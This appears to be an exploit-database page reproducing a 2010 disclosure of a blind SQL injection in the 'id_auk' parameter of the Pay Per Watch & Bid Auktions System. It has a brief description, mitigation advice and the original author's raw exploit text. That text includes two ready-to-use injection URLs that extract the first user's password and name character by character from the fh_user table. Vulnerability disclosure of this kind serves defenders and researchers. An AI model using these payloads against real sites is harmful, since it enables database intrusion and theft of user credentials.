header-logo
Suggest Exploit
vendor:
Pay Per Watch & Bid Auktions System
by:
Easy Laster
7,5
CVSS
HIGH
BLIND SQL Injection
89
CWE
Product Name: Pay Per Watch & Bid Auktions System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Pay Per Watch & Bid Auktions System BLIND SQL Injection auktion.php (id_auk)

A vulnerability in the Pay Per Watch & Bid Auktions System allows an attacker to inject malicious SQL commands into the 'id_auk' parameter of the 'auktion.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be used to disclose the contents of the database, including usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Pay Per Watch & Bid Auktions System BLIND SQL Injection auktion.php (id_auk)
+Autor : Easy Laster
+Date   : 20.03.2010
+Script  : Pay Per Watch & Bid Auktions System
+Price : 319.90 €
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/auktion/auktion.php?id_auk=

#password
+Exploitable   : http://www.site.com/auktion/auktion.php?id_auk=1+and+1=1+and+ascii
(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1


#username
+Exploitable
http://www.site.com/auktion/auktion.php?id_auk=1+and+1=1+and+ascii
(substring((SELECT vorname FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
----------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR